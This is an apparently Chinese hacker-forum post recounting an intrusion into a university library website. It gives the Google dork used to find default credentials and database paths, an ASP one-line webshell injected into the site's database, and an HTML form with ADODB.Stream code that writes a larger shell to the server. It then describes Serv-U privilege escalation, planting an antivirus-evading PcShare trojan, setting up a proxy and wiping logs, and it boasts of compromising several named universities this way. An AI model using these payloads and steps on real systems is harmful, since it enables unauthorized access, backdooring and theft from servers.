看到了一篇 又一篇文章 都是些老思路 没什么新意....
不过看到了一个 觉得可以利用的文章 (忘了是黑防还是 手册上的文章了)
作者是在baidu和google上搜索 inurl: read.txt 然后拿到一堆 webshell
呵呵 这个家伙真是机灵 把我N年前的思路给搬到黑防上去了 早知道我应该申请专利
其实 大伙搜索 inurl:使用帮助.txt 这个会更有用的.... 会搜索出很多 中文的站点
我今天实在郁闷到极点了,就上google一阵狂搜 翻了几十页后 突然眼睛一亮,发现了一个
www.xxx.edu.cn/lib/使用帮助.txt
呵呵 这下它有的受了
直接复制 上面的路径 IE打开后 按照里面的说明直接找到默认的管理员账号和密码,管理员账号和密码是:webadmin adminweb 默认路径为 login_webadmin.asp 打开后 麻木的把密码输入到框框 发现管理员密码不对 真是书山有路勤为径啊 一不小心发现了 web/data/database/db.lib/webadmin.asa 这不是传说中的 数据库么 ---------呵呵 得来全不费功夫. 复制好路径 打开显示乱码 这下好了 打开它的图书馆网站 注册会员后 找到可写的目录 插入 一句话 <%execute request("cnlnfjhh")%> 应该已经插到数据库中了 因为说明里面就只有这么一个默认数据库 呵呵
然后 把下面的 代码:
<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> //注:xxx.asp为数据库,也就 是你至少要知道数据库路径//
<textarea name=cnlnfjhh cols=120 rows=10 width=45>
set lP=server.CreateObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("temp.asp"),2
lP.Close
set lP=nothing
response.redirect "temp.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45></textarea><BR><center><br>
<input type=submit value=提交>”
保存为 html的页子 用记事本打开 把插入过马的 asp页子 替换上面的<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> 里的路径.
写入大马 submit 提交 呵呵 一个shell 到了 进去后翻了翻 服务器里有 serv-u 6.0.1 呵呵 找到 可写的目录 上传自己免杀的
su.exe 提权 然后 执行 偶Cn 自己免杀了快一年的一个 pcshare服务端 过了 半分钟 一个肉鸡 在客户端上 "咚咚"的上线了
看了看配制 03的 2G内存 4块CPU 速度非常快~ 做了个代理 擦完PP 走人...................
上面是偶的入侵大概经过 方法是04年的 不过思路值得大家借鉴...呵呵
由于很多 管理员用的整站程序 自己懒的修改一下 所以 里面默认的数据库和管理员 就会暴露出来.给我们的入侵 多了一个 旁器.
记得在04年的时候:西安交通大学 西北工业大学 清华大学的图书馆ect........ 都是我曾经通过此方法拿下的 汗一个 .